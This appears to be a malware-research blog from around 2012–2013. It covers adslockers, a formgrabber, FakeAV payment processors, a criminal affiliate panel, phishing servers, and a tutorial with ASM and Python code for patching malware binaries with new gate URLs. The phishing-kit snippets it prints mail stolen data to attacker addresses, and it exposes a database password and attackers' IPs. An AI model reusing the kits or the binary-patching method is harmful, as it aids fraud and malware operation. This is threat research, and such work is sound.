
AVScanner Source


DeadLine's Survey Builder (Adslocker)

Another 'adslock', this time in .NET (so yeah, it comes from HF).

Webcheck:
It opens a web page pointing to a text file and looks for your HWID in the txt; on the list? Allowed.

Builder:


Locker:

Designed to fail.
Opens a 'random' program; not so random, just predefined URLs:
And the infected victims must have Windows on drive letter 'C' (lol?)
Another example:

Writes words, not so random, predefined once again:

Opens random predefined sites:

URL/password stored in plain text:

For the rest it's just the usual infection routine: registry persistence via HKCU[...]CurrentVersion\Run, etc.
AdsLockers seem to be in fashion on Hackforums since Adslock.A.
RazorLock:

FileIce open source AdsLock:

Another AdsLock from HF:

Please guys.. no more .NET

Raspberry Pi

Web Crab formgrabber

And to finish my hackforum tour for the day...
Advert:

9 KB with UPX:

Looking for process:

Open process:

WriteProcess:


And CreateRemoteThread. (The first time I ran the malware it made Firefox crash; the second time it worked.)
So let's debug Firefox...


When I try to log in on VirusTotal:

POST requests are intercepted:

Data are encrypted and sent to the panel (here it's localhost/development/panel.php)

If you look for the sample...
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2234

Talking to a FakeAV black processing service

Finding a payment processor for black (illicit) traffic is complicated and a private kind of business, because they are connected to banks and real life; in 2011 most FakeAV programs were in difficulty due to the ChronoPay story.

Good example of a known payment processor:
130.185.108.163:
130.185.108.162:
130.185.108.161:
130.185.108.157:
130.185.108.156:

Used by Security Monitor 2012 and many others; the landings are still in place:

Let's contact the payment guys:

First approach:
He answered that they work through a Lithuanian bank and want 20% of revenue.
They are not connected with ChronoPay and have just finished a new project (now in test).

One week later:

I asked him about security, trustworthiness of the bank, offshore accounts, types of payments, duration of payments, etc.
He said they can transfer money via LR, WM, wire transfer or cash, and an offshore account is needed to transfer money via wire.
He said the bank knows about malware and won't cooperate with police.
He also said that I need hosting and clean domains, then he would give me all the instructions to make a payment page.
I've not coded a fake FakeAV affiliate, but that could be a future project to trap payment processors and FakeAV actors.


HS: Thanks for the postcard /a/non, received everything and I still wait for 25 Dec to unbox the rest, meri kurisumasu to you too (´・ω・`)

Is it the end of Citadel?

Not the end of the world like the Mayan calendar predicted, but the end of Citadel.
Since November, Aquabox has mysteriously vanished from forums and Jabber.

He even got banned on an underground forum.

Last CRM (Customer Relationship Management) URL:


And shut down later, leaving just an edited post at the end of November:
Citadel 1.3 - FF / IE / Chrome Grabber / Video Recording, AntiTracker Protection & CRM
removed
Last edited by AquaBox; 28th November 2012

So we will probably not see the Winter update.

But who cares... Carberp is back; customers will probably just move now (like for SpyEye).

Moneycloud PPI Affiliate (Simda.A)

A new PPI affiliate appeared.

I've known about it since the beginning, I was just too bored to have a look... via mails etc.

Advert:

Statistics screenshot from a guy inside:

ICQ:

It's the end of 2012 so... wanna laugh a bit?
For the fake screenshots I've not used a hacked server, I just browsed Hackforums and 'stole' a screenshot:

Hide the notepad and the bot's last response with my ICQ discussion:

mfw:

It was a bit delicate after he wanted to test me:

I made him wait while I found a solution without harming people...
Finally, after that I was ready... but the support was away...

The affiliate page was not difficult to find, you just have to search for the mail address he used for ICQ.

And we have...
• dns: 1 ›› ip: 111.90.159.122 - adresse: MONEYCLOUD.SU
• dns: 1 ›› ip: 46.183.220.14 - adresse: MCSTAT.SU

Hosted by Piradius.

Login page:

Even cooler, you can play the game of 'who joined the aff'.
If a member doesn't exist on the affiliate you will get this error message:
If the guy exists:
They have a 'test' account:
>username exist
>Invalid username


Ok, enough trolling; after 4 hours of idling the support is back on ICQ:

The account creation took 30 mins hmm... ok, I waited 1h in the end:

Dashboard:

Stats:

Payments:

EXE download:

Profile:

So I looked at the source and...

add-teammember:
add-project:
categories:
I said I would not troll them but it's hard to resist.
Want to have a look at admin mode?
Dashboard:

Add a new member:

Add category:

User list:

Modify news:


Profile update:

Write batch:

Found also the way to view the profile of guys


And what do they load?
Okay, I don't even need to reverse it, thanks!

For the sample he asked me to do 20-30 loads: https://www.virustotal.com/file/9d6367cca7b0de6f574ac622d7c12ef22d58b5268b12db9bd82de0d6b40ad184/analysis/1356133199/

File downloaded from the panel: https://www.virustotal.com/file/6a9683f64045ac8c95f77544125d8127cb889e69787fdb0c2ee7ffc861c425e5/analysis/1356140250/

No, seriously, the file is interesting: it's a trojan downloader whose payload is a rootkit with file infector capabilities (infects fastfat.sys) + an exploit on board (a brief look revealed CVE-2010-3338) + a lot of anti-VM, anti-forensics and a Bitcoin miner under VB RunPE.

I grabbed the admin IP also, but he's behind a proxy.
Moment : 22/12/2012 17:47:59
Ip : 95.140.125.62
Host : free-125-62.mediaworksit.net
ref : Unspecified
ua: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0
Moment : 22/12/2012 17:48:14
Ip : 95.140.125.62
Host : free-125-62.mediaworksit.net
ref : Unspecified
ua: Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0




Happy holidays and see you in 2013!

Phish-BankFraud/PHP.Mailer/PHP.Shell

Investigation of some compromised servers used for phishing during these two weeks. (Part 2 of Phishing Hunting, a bit more technical now.)
The first site is gtmaustralia.com.au, phishing mirrors:
http://www.phishtank.com/phish_detail.php?phish_id=1693107
http://www.phishtank.com/phish_detail.php?phish_id=1693117
Targeting PayPal; the compromised server runs Joomla 1.5.20 Stable Release [18-July-2010]

The hacker used a phishing redirector on another compromised server running WordPress:
http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
VT 0/46 - VT 3/34

Several backdoors were found:
VT 21/46

And a WSO shell with obfuscated code to avoid antivirus.
VT 18/46

On the server side, resend.php sends the phished data to the hacker:
$samaka="asq01@hotmail.fr";
$subject="Off $ip";
$from="From: InfoRmation<google@gmail.com>";
$from.="-Info\n";
mail($samaka,$subject,$message,$from);

The server was also used to target EDF (Électricité de France)
http://www.phishtank.com/phish_detail.php?phish_id=1693109
VT 0/46

Data are still sent via e-mail, sniper.php:
<?php
$to="wait0all@gmail.com";
$ip=getenv("REMOTE_ADDR");

Cielo targeted, VT 5/46
http://www.phishtank.com/phish_detail.php?phish_id=1693131
$headers="Content-type: text/html; charset=iso-8859-1\r\n";
$headers.="From: Cielo <desejovip@hotmail.com";

And also Banco do Brasil, VT 0/46
http://www.phishtank.com/phish_detail.php?phish_id=1693133
That's a lot of phishes for just one server and it's not finished: the server was also used for spam:
VT 0/46

VT 9/46

Now, by viewing the access logs, I suspect 41.249.93.120:
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
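A triage pass over access logs like these, as an added example (not the post's own tooling): it parses combined-format lines, tags requests carrying the file-manager parameters seen above (action=upload, action=edit, action=backtool, chdir=) as operator activity and self-referring POSTs to the phishing script as victim submissions, then summarises per IP. The log lines are constructed, modelled on the entries above, with documentation-range addresses.

```python
import re

# Apache combined log format, as in the access.log excerpts above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Query parameters of the PHP file manager dropped on the server
# (rsform_backup_*.php?x&action=upload&chdir=...). A Joomla /media/ path has
# no legitimate reason to receive them, so they mark the operator, not victims.
SHELL_PARAMS = ("action=upload", "action=edit", "action=backtool", "chdir=")

# Constructed sample, modelled on the entries above (documentation-range IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2013:04:39:47 +1100] "POST /media/rsformbkp0000/rsform_backup.php?x&action=upload&chdir=/home/victim/public_html/media/ HTTP/1.1" 200 11887 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
203.0.113.7 - - [01/Jan/2013:04:41:48 +1100] "GET /media/rsformbkp0000/ms-files.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
198.51.100.23 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp0000/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
198.51.100.23 - - [03/Jan/2013:04:55:31 +1100] "POST /media/rsformbkp0000/ms-files.php HTTP/1.1" 200 8643 "http://www.example.com.au/media/rsformbkp0000/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
192.0.2.44 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp0000/rsform_backup.php?x&action=edit&chdir=/home/victim/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
198.51.100.9 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp0000/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Tag a parsed request: file-manager use (operator) or self-posting form (victim)."""
    path, _, query = rec["url"].partition("?")
    tags = []
    if any(p in query for p in SHELL_PARAMS):
        tags.append("webshell-filemanager")
    # A POST to a .php under /media/ whose referer is the same script is the
    # phishing page posting its own form: a victim submitting credentials.
    if (rec["method"] == "POST" and path.endswith(".php")
            and "/media/" in path and rec["referer"].endswith(path)):
        tags.append("phish-form-post")
    return tags


def triage(lines):
    """Per-IP summary of suspicious requests: tags, hit count, first/last seen."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        tags = classify(rec)
        if not tags:
            continue
        e = report.setdefault(rec["ip"], {"tags": set(), "hits": 0,
                                          "first": rec["ts"], "last": rec["ts"]})
        e["tags"].update(tags)
        e["hits"] += 1
        e["last"] = rec["ts"]
    return report


def operators(report):
    """IPs that drove the file manager: the people running the shell."""
    return sorted(ip for ip, e in report.items() if "webshell-filemanager" in e["tags"])


def victims(report):
    """IPs that only submitted the phishing form: likely victims, not operators."""
    return sorted(ip for ip, e in report.items() if e["tags"] == {"phish-form-post"})


if __name__ == "__main__":
    r = triage(SAMPLE_LOG.splitlines())
    print("operator IPs:", operators(r))
    print("victim submissions from:", victims(r))
```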

Second case (and probably the same guys behind it)
Phishing targeting EDF: http://www.phishtank.com/phish_detail.php?phish_id=1693105
The server is running Joomla here again.

This time, the log files were cleared.
I've posted the previous info, including log files, on kernelmode. (Did they read me?)

Data are still sent via mail, index3.php:
$myemail="jinshoori@gmail.com,t0od@hotmail.fr";

loginAction.action.php:
$myemail="jinshoori@gmail.com";//email here

And used as a spam relay here again:

The shell found this time was an edited version of Backdoor.PHP.WebShell.BD:

In a similar case I coded a tool to retrieve phishing URLs from rotators:

The server was saturated later:

Open dir:

They make different dirs with phishing pages to evade antivirus:

The last case was a PayPal phish page found by markusg targeting German people.
The server is running WordPress.
http://www.phishtank.com/phish_detail.php?phish_id=1694455

Not the same guys, not the same technique.
This time, data are sent to a MySQL db on another compromised server:
mysql_connect("193.107.19.***","ccs","LTBDVQ7bYewff5Dc");
mysql_select_db("ccs");
$url=mysql_real_escape_string($_S

'ccs' makes me think 'Credit Card Sell'.
On the server where the data are sent, the hacker uses a parser for credit cards.

The server was also used for spam:
VT 5/46

The data collected are probably used to supply carding shops.

You can find more research/dumped phishing pages/spam tools/additional files here, including mail sources, and here for dumped backdoors.
Also interesting: Unixfreakjp has done a post about the connection between backdoors and exploit kits here.


Black processing service for malware only

Advert:

Shortened a bit:
good Internet day =)
I'm looking for a partner with working spyware or an owner of affiliate program
I have a working merchant for plastic cards, for high risk. (not for carding)

Some companies are registered; online-banking is included.
I can give online (probably, access to online banking) to a partner.
Payments just one time in a week (one time in 4 business days).
The number of chargebacks is 6%.

Expenses for processing:
1) 10 hold (don't understand this number) for 180 days - it won't be returned, it will be used for chargeback and refunds
2) processing costs 5%, 10% - bribes;
3) conversion from offshore wire to WM costs 5%
average expenses are 30%; It is nice to give 40-50% to adverts
I can divide profit by 50 on 50%; (in case of high profit the percent can be changed to 70/30)
$Contragents will compensate up to $100k.
It (merchant, probably) will live approximately for 3 months after start.
Just spyware, not viagra/pharma.
Starting date - 7 of July.
P.S. Merchant is ready !

Andromeda bot


Comes from a Keitaro TDS: http://urlquery.net/report.php?id=756624

Leads on: ald-facebook.co.uk/operations/outer_band_remote.php
Payload: http://vxvault.siri-urz.net/ViriFiche.php?ID=22729

Andromeda 2.6, probably made with the Andromeda builder

Bots:

Blacklist:

Task:
output.exe is SpyEye, password for the config: FD0CCB937D91AD7355A4B072D91EB1B8
Second file is Sirefef CLSID edition.

Edit task:

Service:

Socks:

Formgrabber:
Nothing really interesting at all.


How to hex a malware and make a builder

Hello, a tutorial made some weeks ago on Trojanforge; I got the idea to write it after seeing this:

And also because malware builders seem to be in fashion these days.
When malware writers give only bins and no builder, the only way to fuck them up is to codecave the bin to make it do what we want.
You have many advantages because you can remove bugs, add features... you are free.
For this, you will need: OllyDbg, HexDecCharEditor v1.02 (or any other hex editor) and a minimum of intelligence.

For the coding part I've chosen 2 languages: Visual Basic 6, and Assembly with masm32 and WinASM as IDE (two extremes: one high-level and one low-level language).

So let's start.
The first step is to locate the things you need to modify inside the malware (e.g. gate URLs, timers, encryption keys).
As the malware, due to ethical issues, I will choose a simple unNagMe coded quickly in ASM.
That way you can try to modify things without the fear of being infected.

This executable can be downloaded with both source codes at the end of this post.

Run OllyDbg and load the executable to have a look and see what the code looks like.

Pretty simple, with a good zone of zero-filled bytes, and we see the strings are referenced at 0x403000 and 0x403023.
We need to find a zone with enough null bytes to insert our URL; the zero-filled place on the screenshot could be good, but I've chosen to add my string under the original one.
This green place can be used; I've used HexDecCharEditor to find it:

Now that we have found a place for our URL we need to modify the executable to make it use our string.

(file offset 843, VA=0x403043)
Double click on the line and modify the code, then: Right Click > Copy to executable > All modifications.
A window appears: click 'Copy all', then another window appears; right click on it and click 'Save file'.

Everything is cool now.
We just need to code a program that will edit our binary at 0x403043.
For that I will modify some of my old VB6 and ASM code.

Basic interface:

Please note that for Visual Basic I've used a CommonDialog, meaning the program depends on one OCX: COMDLG32.
The code for both is a bit hardcoded and can be improved, but it works and it's enough for me.
Once the file is built, the hexed version is named "Malware.exe.ViR".
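The same builder logic in Python, as an added example that is not part of the tutorial's package: translate the VA OllyDbg shows (0x403043) to a file offset through the PE section table instead of hardcoding 0x843, refuse to write unless the 64-byte zone is still null-filled (the check the ASM does against Sequence/WBuffer), and pad the string to the zone size. The PE image is a constructed stand-in for the unNagMe target, laid out so the VA lands at 0x843; the sinkhole URL is a placeholder.

```python
import struct


def build_demo_pe() -> bytearray:
    """Constructed stand-in for the target: a bare PE32 with one .data section
    at RVA 0x3000 / raw offset 0x800 and ImageBase 0x400000, so that
    VA 0x403043 maps to file offset 0x843 exactly as in the tutorial."""
    e_lfanew = 0x80
    img = bytearray(0x800 + 0x200)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # IMAGE_FILE_HEADER: Machine=i386, 1 section, SizeOfOptionalHeader=0xE0
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = e_lfanew + 24
    struct.pack_into("<H", img, opt, 0x10B)          # PE32 magic
    struct.pack_into("<I", img, opt + 28, 0x400000)  # ImageBase
    sec = opt + 0xE0
    img[sec:sec + 8] = b".data\0\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", img, sec + 8, 0x200, 0x3000, 0x200, 0x800)
    return img


def va_to_offset(pe: bytes, va: int) -> int:
    """Translate a virtual address (what the debugger shows) to a file offset
    (what the hex editor and the builder need) via the section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", pe, opt)
    if magic == 0x10B:                                # PE32
        image_base, = struct.unpack_from("<I", pe, opt + 28)
    elif magic == 0x20B:                              # PE32+
        image_base, = struct.unpack_from("<Q", pe, opt + 24)
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    rva = va - image_base
    for i in range(nsec):
        hdr = opt + opt_size + i * 40
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            delta = rva - vaddr
            if delta >= rawsize:
                raise ValueError("VA lies in uninitialised data, not in the file")
            return rawptr + delta
    raise ValueError("VA %#x is not inside any section" % va)


def patch_string(image: bytearray, offset: int, value: str, width: int = 64) -> int:
    """Write `value` NUL-terminated and padded to `width` bytes at `offset`, but
    only if the zone still holds the null bytes the builder expects. Like the
    Sequence/WBuffer compare in the ASM, this refuses a wrong offset or a
    second patch. Returns the number of meaningful bytes written."""
    raw = value.encode("ascii") + b"\0"
    if len(raw) > width:
        raise ValueError("string longer than the %d-byte zone" % width)
    zone = image[offset:offset + width]
    if len(zone) != width:
        raise ValueError("offset past end of file")
    if any(zone):
        raise ValueError("zone is not null-filled: wrong offset or already patched")
    image[offset:offset + width] = raw.ljust(width, b"\0")
    return len(raw)


if __name__ == "__main__":
    pe = build_demo_pe()
    off = va_to_offset(pe, 0x403043)
    print("VA 0x403043 -> file offset %#x" % off)
    # placeholder lab URL: point the sample at your own sinkhole, not a live gate
    n = patch_string(pe, off, "http://sinkhole.lab.example/gate.php")
    print("wrote %d bytes" % n)
```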

ASM Code, patch.asm:
.386
.model  flat,stdcall
option  casemap:none

include        windows.inc
include        user32.inc
include        kernel32.inc
include        shell32.inc
include        advapi32.inc
include        gdi32.inc
include        comctl32.inc
include        comdlg32.inc
include        masm32.inc
include        /masm32/macros/macros.asm
includelib      user32.lib
includelib      kernel32.lib
includelib      shell32.lib
includelib      advapi32.lib
includelib      gdi32.lib
includelib      comctl32.lib
includelib      comdlg32.lib
includelib      masm32.lib
includelib      winmm.lib

DlgProc               Proto    :DWORD,:DWORD,:DWORD,:DWORD
List                  Proto    :DWORD,:DWORD
Patch                 Proto    :DWORD
Scan                  Proto

.data

ProgId          db "RED WM",0
TargetName      equ "- SomeAppName vX.XX.XXX -",0
TargetName2     equ "ExampleApp.exe",0
NameofTarget    db TargetName,0
SecondN         db "Malware.exe.ViR",0      ; name of the patched copy
; 64 null bytes: what the patch zone must still contain before we write into it
Sequence        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
                db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
                db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
                db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
WBuffer         db  256 dup(00)             ; URL typed in the dialog (64 bytes are written)
PatchOffset     dd  00000843h               ; file offset of the zone, VA=403043

StartNfo     db "* Close the application if open.",0
StartNfo2    db "* Just apply the patch.",0
StartNfo3    db "* Waiting for your order ...",0
;------------------------------------------------
Backup       db "* Offsets patched, Creating Backup...",0
Success      db "* Target patched successfully, n-j0y ;)",0
Version      db "* Invalid File version, or already patched.",0
Nothing      db "* Nothing patched, Aborted*",0
Searching    db "* Analysing offsets...",0
ReadError    db "* Can't Read the file.",0
WriteError   db "* Nothing patched, Aborted*",0
